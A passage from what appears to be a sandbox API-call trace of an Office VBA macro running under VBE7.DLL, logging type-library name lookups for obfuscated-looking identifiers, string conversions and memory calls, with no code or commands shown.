This=0x665bd20, szNameBuf="_B_var_ncAo_UG", lHashVal=0x105c54, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.165] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.165] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.165] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ncAo_UG", lHashVal=0x105c54, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.165] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.165] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.165] IUnknown:Release (This=0x665ba50) returned 0xd [0069.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1169e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ncAo_UG") returned 15 [0069.165] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ncAo_UG", lHashVal=0x105c54, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x5f006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x5f006f00000000, pDummy=0x0) returned 0x0 [0069.165] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a628e6 | out: _Dst=0x144ec0) returned 0x0 [0069.166] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hAAAD4kA", lHashVal=0x1086ee, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6290e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="hAAAD4kA") returned 9 [0069.166] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hAAAD4kA", lHashVal=0x1086ee, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6290e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="hAAAD4kA") returned 9 [0069.166] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hAAAD4kA", lHashVal=0x1086ee, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hAAAD4kA") returned 0x1086ee [0069.166] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="hAAAD4kA" | out: _Dst="hAAAD4kA") returned 0x0 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="hAAAD4kA") returned 9 [0069.166] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.166] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hAAAD4kA", lHashVal=0x1086ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.166] IUnknown:Release (This=0x665ba50) returned 0xd [0069.166] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.166] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hAAAD4kA", lHashVal=0x1086ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.166] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.166] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.166] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hAAAD4kA", lHashVal=0x1086ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.166] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.166] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.166] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hAAAD4kA", lHashVal=0x1086ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.166] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6290e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="hAAAD4kA") returned 9 [0069.166] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hAAAD4kA", lHashVal=0x1086ee, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.167] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.167] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6290e | out: _Dst=0x67c2d40) returned 0x0 [0069.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hAAAD4kA") returned 0x105e77 [0069.167] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_hAAAD4kA" | out: _Dst="_B_var_hAAAD4kA") returned 0x0 [0069.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_hAAAD4kA") returned 16 [0069.167] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.167] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hAAAD4kA", lHashVal=0x105e77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.167] IUnknown:Release (This=0x665ba50) returned 0xd [0069.167] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.167] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hAAAD4kA", lHashVal=0x105e77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.167] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.167] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.167] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hAAAD4kA", lHashVal=0x105e77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.167] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.167] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.167] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hAAAD4kA", lHashVal=0x105e77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.167] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.167] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.167] IUnknown:Release (This=0x665ba50) returned 0xd [0069.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b116ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_hAAAD4kA") returned 16 [0069.167] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hAAAD4kA", lHashVal=0x105e77, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.167] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6290e | out: _Dst=0x144ec0) returned 0x0 [0069.167] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.167] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.167] IUnknown:Release (This=0x665ba50) returned 0xd [0069.167] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.168] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.168] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.168] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.168] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.168] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.168] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.168] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.168] IUnknown:Release (This=0x665ba50) returned 0xd [0069.168] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.168] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.168] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.168] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.168] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.168] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.168] IUnknown:Release (This=0x665ba50) returned 0xd [0069.168] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.168] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.168] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.168] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.168] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.168] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.169] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.169] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.169] IUnknown:Release (This=0x665ba50) returned 0xd [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.169] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.169] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.169] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.169] IUnknown:Release (This=0x665ba50) returned 0xd [0069.169] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.169] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.169] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.169] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.169] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.169] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.169] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.169] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.169] IUnknown:Release (This=0x665ba50) returned 0xd [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.169] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.170] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.170] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.170] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.170] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.170] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.170] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.170] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.170] IUnknown:Release (This=0x665ba50) returned 0xd [0069.170] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.170] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.170] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.170] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.170] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.170] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.170] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.170] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.170] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.170] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.170] IUnknown:Release (This=0x665ba50) returned 0xd [0069.170] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.171] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.171] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6286e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="toDcAAA") returned 8 [0069.171] ITypeComp:RemoteBind (in: This=0x665ba60, szName="toDcAAA", lHashVal=0x10a6a7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6286e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="toDcAAA") returned 8 [0069.171] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="toDcAAA", lHashVal=0x10a6a7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6286e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="toDcAAA") returned 8 [0069.171] ITypeComp:RemoteBind (in: This=0x665bd30, szName="toDcAAA", lHashVal=0x10a6a7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="toDcAAA") returned 0x10a6a7 [0069.171] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="toDcAAA" | out: _Dst="toDcAAA") returned 0x0 [0069.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="toDcAAA") returned 8 [0069.171] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.171] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="toDcAAA", lHashVal=0x10a6a7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.171] IUnknown:Release (This=0x665ba50) returned 0xd [0069.171] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.171] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="toDcAAA", lHashVal=0x10a6a7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.171] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.171] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.171] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="toDcAAA", lHashVal=0x10a6a7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.171] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.171] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.171] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="toDcAAA", lHashVal=0x10a6a7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.171] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6286e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="toDcAAA") returned 8 [0069.172] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="toDcAAA", lHashVal=0x10a6a7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.172] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.172] _mbscpy_s (in: 